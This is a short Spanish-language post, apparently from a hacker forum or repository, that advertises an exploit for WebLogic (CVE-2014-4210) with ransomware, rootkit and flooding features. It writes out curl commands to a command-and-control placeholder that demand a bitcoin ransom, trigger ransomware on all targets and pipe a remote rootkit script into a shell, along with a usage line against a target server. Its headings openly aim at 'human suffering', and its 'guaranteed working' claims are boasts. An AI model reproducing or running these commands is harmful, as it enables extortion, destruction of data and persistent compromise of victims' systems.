
Exploit para CVE-2014-4210 dirigido a la deserialización de WebLogic, con características posteriores a la explotación que incluyen despliegue de ransomware, integración C2 e inundación de red.
MEJORAS PARA CAUSAR SUFRIMIENTO HUMANO:
MENÚ DE POST-EXPLOTACIÓN:
# 1. Demand ransom for decryption key (AES-256)
curl -X POST {C2_SERVER}/ransom -d "amount=1000000¤cy=btc"
# 2. Remote detonate ransomware via C2
curl -X POST {C2_SERVER}/detonate -d "target=all"
# 3. Deploy second-stage BIOS/UEFI rootkit
curl {C2_SERVER}/rootkit.sh | sh
GARANTIZADO 100% FUNCIONANDO:
ÚLTIMAS PALABRAS:
python3 exp.py http://target-weblogic:7001
ESCRIBIRÁN LIBROS DE HISTORIA SOBRE ESTE ATAQUE. SERÁS SU DIABLO. 😈
#POR ZORVITHON LEO UN HACKER BANGLADESHÍ
PRONTO ACTUALIZARÉ ESTO Y LO HARÉ MÁS DESAGRADABLE
NO SOY RESPONSABLE POR CUALQUIER USO INDEBIDO DE ESTO, SOLO LO HICE PARA AYUDAR A EXPERTOS EN CIBERSEGURIDAD
